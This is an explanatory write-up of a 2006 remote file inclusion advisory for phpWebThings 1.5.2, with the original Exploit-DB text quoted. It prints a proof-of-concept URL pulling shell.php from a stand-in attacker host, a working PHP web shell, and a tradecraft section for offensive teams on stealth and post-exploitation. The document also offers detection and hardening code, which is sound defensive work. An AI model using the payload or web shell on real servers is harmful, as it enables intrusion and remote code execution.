Understanding PHPWebThings 1.5.2 Remote File Inclusion

What this paper is
This paper details a vulnerability in PHPWebThings version 1.5.2, specifically within the editor.php file. The vulnerability is classified as a "Remote File Inclusion" (RFI). This means an attacker can trick the vulnerable application into including and executing arbitrary files from a remote server, potentially leading to remote code execution.
Simple technical breakdown
The vulnerability exists because the editor.php script uses a variable called $editor_insert_bottom to decide which file to include. However, this variable is not properly checked or initialized before being used. If the web server is configured with register_globals enabled (a common setting in older PHP versions), an attacker can send a specially crafted URL that sets the $editor_insert_bottom variable. By setting this variable to point to a malicious file on an attacker-controlled server, the vulnerable script will download and execute that file.
Complete code and payload walkthrough
The core of the vulnerability lies in a single line of PHP code within core/editor.php at line 289:
if ($editor_insert_bottom<>"") include($editor_insert_bottom);

Explanation of the code fragment:
- if ($editor_insert_bottom<>""): A conditional statement that checks whether the variable $editor_insert_bottom is not empty (i.e., it has some value). The <> operator means "not equal to".
- include($editor_insert_bottom);: If the condition is true (meaning $editor_insert_bottom has a value), this line attempts to include the file specified by the value of $editor_insert_bottom. The include construct in PHP reads the content of the specified file and executes it as PHP code.
Proof of Concept (Payload):
The paper provides a clear proof-of-concept URL:
http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php
Explanation of the Proof of Concept:
- http://[target]/[path]/core/editor.php: The address of the vulnerable script on the target web server.
- ?editor_insert_bottom=: Indicates that a parameter named editor_insert_bottom is being passed to the script.
- http://evilsite.com/shell.php: The value assigned to the editor_insert_bottom parameter. It is a URL pointing to a file named shell.php on an attacker-controlled server (evilsite.com).
How it works together:
- The attacker crafts the URL as shown above.
- The web server receives this request and passes the parameters to the editor.php script.
- Due to register_globals = on, the URL parameter editor_insert_bottom directly creates and sets the PHP variable $editor_insert_bottom to the value http://evilsite.com/shell.php.
- The script reaches line 289: if ($editor_insert_bottom<>"") include($editor_insert_bottom);.
- The condition $editor_insert_bottom<>"" evaluates to true because $editor_insert_bottom is http://evilsite.com/shell.php.
- include() is called with the value http://evilsite.com/shell.php.
- The PHP interpreter on the target server attempts to fetch http://evilsite.com/shell.php.
- If successful, the content of shell.php is executed as PHP code on the target server.
Mapping list:
- core/editor.php, line 289: The vulnerable code block.
- $editor_insert_bottom: The variable that, when controlled by the attacker, leads to the RFI.
- include($editor_insert_bottom);: The call that executes the remote file.
- http://evilsite.com/shell.php: The malicious payload URL.
Shellcode/Payload Segment Explanation:
The paper does not provide specific shellcode bytes. Instead, it relies on the attacker providing a URL to a remote PHP file (e.g., shell.php). The "payload" in this context is the content of that remote PHP file. A common shell.php would contain code to:
- Execute arbitrary commands passed via HTTP GET or POST requests.
- Provide a web-based command shell.
- Upload or download files.
- Perform other malicious actions.
For example, a simple shell.php might look like this:
<?php
// Basic command execution shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
}
?>

When this shell.php is included by the vulnerable editor.php, an attacker could then send requests like:
http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php&cmd=ls -la
This would cause the target server to execute ls -la and display the output.
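As an added example (not part of the original paper or of the phpWebThings code), the PHP script below shows what the requests above look like in a web server access log and flags them. The log lines are constructed for illustration, the function name detectRfi is an assumption of this example, and the check generalizes beyond editor.php: any query parameter whose value is an absolute URL or a PHP stream wrapper is reported, including double-encoded values.

```php
<?php
// Added example: scan access-log lines for remote-file-inclusion attempts.
// Not part of the original paper; the log lines below are constructed.

// Return the findings for one combined-format access log line.
// Any query parameter whose value is an absolute URL or a PHP stream wrapper
// is reported, so this covers editor_insert_bottom and any similar parameter.
function detectRfi(string $line): array
{
    $findings = [];
    // Pull the request target out of "METHOD /path?query HTTP/1.x".
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return $findings;
    }
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return $findings;                  // no query string, nothing to inspect
    }
    // parse_str() percent-decodes values once; decode a second time so that
    // a double-encoded "http%253A%252F%252F" does not slip past the checks.
    parse_str(substr($m[1], $qpos + 1), $params);
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;                      // array parameters (a[]=...) skipped
        }
        $decoded = rawurldecode($value);
        if (preg_match('#^(?:https?|ftp)://#i', $decoded)) {
            $findings[] = "parameter '$name' carries a remote URL: $decoded";
        } elseif (preg_match('#^(?:php|data|expect|phar)://#i', $decoded)) {
            $findings[] = "parameter '$name' uses a stream wrapper: $decoded";
        }
    }
    return $findings;
}

// Constructed sample traffic: one benign request, two RFI attempts against
// editor.php (the second double-encoded and carrying a cmd parameter),
// and one stream-wrapper attempt.
$logLines = [
    '203.0.113.5 - - [18/Nov/2006:10:00:01 +0000] "GET /site/index.php?page=news HTTP/1.1" 200 512',
    '203.0.113.5 - - [18/Nov/2006:10:00:02 +0000] "GET /site/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php HTTP/1.1" 200 64',
    '203.0.113.5 - - [18/Nov/2006:10:00:03 +0000] "GET /site/core/editor.php?editor_insert_bottom=http%253A%252F%252Fevilsite.com%252Fshell.php&cmd=ls%20-la HTTP/1.1" 200 2048',
    '198.51.100.7 - - [18/Nov/2006:10:00:04 +0000] "GET /site/core/editor.php?editor_insert_bottom=php://input HTTP/1.1" 500 0',
];

foreach ($logLines as $line) {
    foreach (detectRfi($line) as $finding) {
        echo "ALERT: $finding\n";
    }
}
```

Run it with the PHP CLI (php detect_rfi.php); the benign index.php request produces nothing, and the three editor.php requests each produce one ALERT line. Matching on the value shape rather than on the parameter name is deliberate: the same rule catches the next application with an uninitialized include variable, not just this one.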
Practical details for offensive operations teams
- Required Access Level: No prior authenticated access is strictly required if the editor.php script is accessible anonymously. However, knowing the path to editor.php is crucial.
- Lab Preconditions:
  - A target server running PHPWebThings 1.5.2.
  - The target server's PHP configuration must have register_globals = on. This is a critical prerequisite. Older PHP versions (prior to 5.4) were more likely to have this enabled by default.
  - The target server must be able to make outbound HTTP requests to the attacker's controlled server. Firewalls or network segmentation could prevent this.
  - An attacker-controlled web server hosting the malicious PHP payload (e.g., shell.php).
- Tooling Assumptions:
  - A web browser for crafting and sending requests.
  - A web server (e.g., Apache, Nginx) with PHP installed to host the attacker's payload.
  - Basic understanding of HTTP requests and PHP.
- Execution Pitfalls:
  - register_globals = off: If register_globals is disabled on the target server, this exploit will not work, as the URL parameter will not automatically create the $editor_insert_bottom variable.
  - Firewall/Network Restrictions: The target server might be prevented from reaching the attacker's server due to outbound firewall rules.
  - URL Encoding: Special characters in the attacker's URL or the command being executed might need proper URL encoding.
  - File Type Restrictions: Some web servers or PHP configurations might prevent the inclusion of remote files, especially if allow_url_fopen or allow_url_include are disabled in php.ini. However, include() is generally more permissive than file_get_contents() regarding allow_url_fopen. The critical directive for include with remote files is allow_url_include (introduced in PHP 5.2.0 and off by default). If allow_url_include is off, this RFI might only lead to LFI (Local File Inclusion) if the attacker can point to a local file. However, the paper explicitly states "Remote File Execution", implying allow_url_include was likely enabled or the PHP version was older, where include could fetch remote files without it.
  - Path Traversal: If the attacker cannot directly include a remote file, they might try to include a local file if allow_url_fopen is enabled but allow_url_include is not. This would turn it into a Local File Inclusion (LFI) vulnerability, allowing them to read local files.
  - Payload Detection: Antivirus or Intrusion Detection Systems (IDS) might detect the outbound connection to the attacker's server or the execution of suspicious commands.
- Tradecraft Considerations:
- Obfuscation: If the target has basic IDS, obfuscating the payload URL or the commands sent might be necessary.
- Stealth: Using a well-known domain for the attacker's server might raise suspicion. A less obvious domain or IP address could be used.
- Payload Choice: The attacker needs to choose a payload that is effective and not easily detectable. A simple command execution shell is a common starting point.
- Post-Exploitation: Once code execution is achieved, the attacker will likely attempt to establish persistence, escalate privileges, or exfiltrate data.
Where this was used and when
- Context: This vulnerability was found in PHPWebThings, a web application framework. Such vulnerabilities are typically exploited against websites built using this framework.
- Approximate Years/Dates: The exploit was published on November 18, 2006. Therefore, its active exploitation period would likely be around 2006-2008, before PHPWebThings was updated or the vulnerable PHP versions became less common. Exploits from this era often targeted older, unpatched web applications.
Defensive lessons for modern teams
- register_globals is a historical danger: This setting was a major source of vulnerabilities. Modern PHP versions (5.4+) have deprecated and removed it. Always ensure register_globals is Off in your PHP configurations.
- Input Validation is Paramount: Never trust user input. Always validate and sanitize any data received from external sources (URL parameters, POST data, cookies, etc.) before using it in sensitive operations like file inclusion or command execution.
- Secure File Inclusion Practices:
  - Avoid including files based on user-supplied input directly.
  - If dynamic inclusion is necessary, use a whitelist of allowed files or paths.
  - Use functions like realpath() to resolve paths and ensure they are within an expected directory.
  - Disable allow_url_fopen and allow_url_include in php.ini unless absolutely necessary, and even then, use extreme caution.
- Keep Software Updated: Regularly update all web applications, frameworks, and their underlying components (like PHP itself) to patch known vulnerabilities.
- Web Application Firewalls (WAFs): A WAF can help detect and block common RFI patterns, but it's a layer of defense, not a replacement for secure coding.
- Code Auditing: Regularly audit your codebase for insecure practices, especially around input handling and file operations.
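The following PHP is an added example, not code from phpWebThings or from the advisory. It places the uninitialized, client-controllable include from core/editor.php line 289 (emulated here with extract() on a request array, since register_globals no longer exists in current PHP) beside a hardened resolver that initializes the variable explicitly, accepts only whitelisted names and confirms the realpath() result stays inside a fixed directory. The function names, the temporary include directory and the footer snippet are assumptions made for this demonstration.

```php
<?php
// Added example; not phpWebThings code. Contrasts the vulnerable include
// pattern with a hardened one. extract() on a request array stands in for
// register_globals = on and is used for the emulation only.

// Vulnerable pattern: the script never initializes $editor_insert_bottom, so
// under register_globals the query string decides what include() receives.
// This function only reports that path; it deliberately never includes it.
function resolveIncludeVulnerable(array $request): string
{
    extract($request);                            // emulates register_globals
    // The original tests an uninitialized variable with <>""; ?? '' reproduces
    // that behaviour without PHP 8's undefined-variable warning.
    $editor_insert_bottom = $editor_insert_bottom ?? '';
    if ($editor_insert_bottom <> "") {
        return $editor_insert_bottom;             // would be include()d verbatim
    }
    return '';
}

// Hardened pattern: read the parameter explicitly, accept only a short name
// from a whitelist, build the path from a fixed directory, and verify with
// realpath() that the resolved file is still inside that directory.
function resolveIncludeSafe(array $request, string $baseDir, array $allowed): ?string
{
    $name = $request['editor_insert_bottom'] ?? '';
    if ($name === '' || !in_array($name, $allowed, true)) {
        return null;                              // unknown or empty: nothing
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;                              // missing file or directory
    }
    // realpath() resolves ".." and symlinks; URLs and wrappers never pass it.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                              // escaped the include directory
    }
    return $path;
}

// Demo: a temporary include directory holding one harmless allowed snippet.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'editor_inserts_' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . '/footer.php', "<?php echo \"footer snippet loaded\\n\";\n");
$allowed = ['footer'];

$attack    = ['editor_insert_bottom' => 'http://evilsite.com/shell.php'];
$legit     = ['editor_insert_bottom' => 'footer'];
$traversal = ['editor_insert_bottom' => '../../etc/passwd'];

echo "vulnerable would include: " . resolveIncludeVulnerable($attack) . "\n";
foreach ([$attack, $legit, $traversal] as $req) {
    $path = resolveIncludeSafe($req, $baseDir, $allowed);
    if ($path === null) {
        echo "hardened rejected: {$req['editor_insert_bottom']}\n";
    } else {
        include $path;                            // only a whitelisted local file
    }
}

unlink($baseDir . '/footer.php');
rmdir($baseDir);
```

Run with php include_hardening.php: the vulnerable resolver hands the remote URL straight to include(), while the hardened one rejects both the URL and the traversal string and includes only footer.php. The whitelist does the real work; realpath() is a second check that also covers a whitelist entry that later turns into a symlink pointing outside the directory.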
ASCII visual (if applicable)
This vulnerability can be visualized as a direct path from an attacker's input to the server's file inclusion mechanism.
+------------------+      +--------------------+      +-----------------------+
| Attacker's URL   | ---> | Target Web Server  | ---> | PHPWebThings          |
| (e.g., ?editor_  |      | (PHP interpreter)  |      | (core/editor.php)     |
| insert_bottom=   |      +--------------------+      |                       |
| http://evil.com/ |                                  | if ($editor_insert_   |
| shell.php)       |                                  |   bottom<>"")         |
+------------------+                                  |   include($editor_    |
                                                      |     insert_bottom);   |
                                                      +-----------+-----------+
                                                                  |
                                                                  v
                                                      +-----------------------+
                                                      | Remote File Server    |
                                                      | (http://evil.com/)    |
                                                      |                       |
                                                      | shell.php             |
                                                      | (Malicious PHP code)  |
                                                      +-----------------------+

Source references
- Paper URL: https://www.exploit-db.com/papers/2811
- Raw Exploit URL: https://www.exploit-db.com/raw/2811
- Affected Software Vendor: http://www.phpwebthings.nl/
- Affected Software Download: http://prdownloads.sourceforge.net/phpwebthings/phpwebthings_1_5_2.zip?download
Original Exploit-DB Content (Verbatim)
+-------------------------------------------------------------------------------------------
+ phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: phpWebThings 1.5.2
+ Vendor ............: http://www.phpwebthings.nl/
+ Download ..........: http://prdownloads.sourceforge.net/phpwebthings/phpwebthings_1_5_2.zip?download
+ Description .......: "phpWebThings is a Powerful, professional application framework"
+ Dork ..............: "This website was created with phpWebThings"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ phpWebThings 1.5.2 core/editor.php does not initialize the $editor_insert_bottom variable
+ before using it to include files, assuming register_globals = on, we can initialize the
+ variable in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ core/editor.php, line(s) 289:
+ -> 289: if ($editor_insert_bottom<>"") include($editor_insert_bottom);
+
+ Proof Of Concept:
+ http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php
+-------------------------------------------------------------------------------------------
# milw0rm.com [2006-11-18]